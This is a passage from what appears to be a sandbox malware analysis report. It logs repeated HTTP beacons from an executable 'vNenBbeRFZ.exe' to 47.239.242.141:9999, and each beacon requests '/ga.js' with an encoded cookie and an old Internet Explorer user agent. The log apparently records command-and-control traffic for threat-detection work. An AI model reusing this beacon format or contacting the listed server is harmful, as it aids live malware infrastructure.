Oct 8, 2024 04:19:59.950898886 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	54022	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:00.070600033 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:01.004671097 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	54029	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:01.112235069 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:02.013458967 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	54035	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:02.128597021 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:03.043184996 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	54046	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:03.181911945 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:04.062051058 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	54052	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:04.175789118 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:05.105377913 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	54058	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:05.221843004 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:06.144515038 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	54067	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:06.252935886 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:07.187200069 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	54075	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:07.299865961 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:08.438564062 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	54076	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:08.550318003 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:09.488781929 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	54087	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:09.601660967 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:10.501688004 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	54093	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:10.619745016 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:11.547317982 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	54099	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:11.666063070 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:12.550916910 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	54110	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:12.663024902 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:13.596189976 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	54116	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:13.728816032 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:14.642086983 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	54123	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:14.753990889 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:15.650712013 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	54132	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:15.768197060 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:16.696935892 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	54137	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:16.817748070 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:17.715440989 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	54141	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:17.834855080 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:18.743299961 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	54147	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:18.862215042 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:19.807754040 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	54151	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:19.924626112 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:20.836843967 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	54157	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:20.955988884 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:21.896529913 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	54167	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:22.049834013 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:22.942291975 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	54174	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:23.051986933 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:23.970520020 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	54180	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:24.102310896 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:25.001955986 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	54190	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:25.114722967 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:26.025738955 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	54197	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:26.145644903 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:27.038786888 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	54203	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:27.175864935 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:28.096061945 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	54209	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:20:28.208415985 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:20:29.113360882 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	54220	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
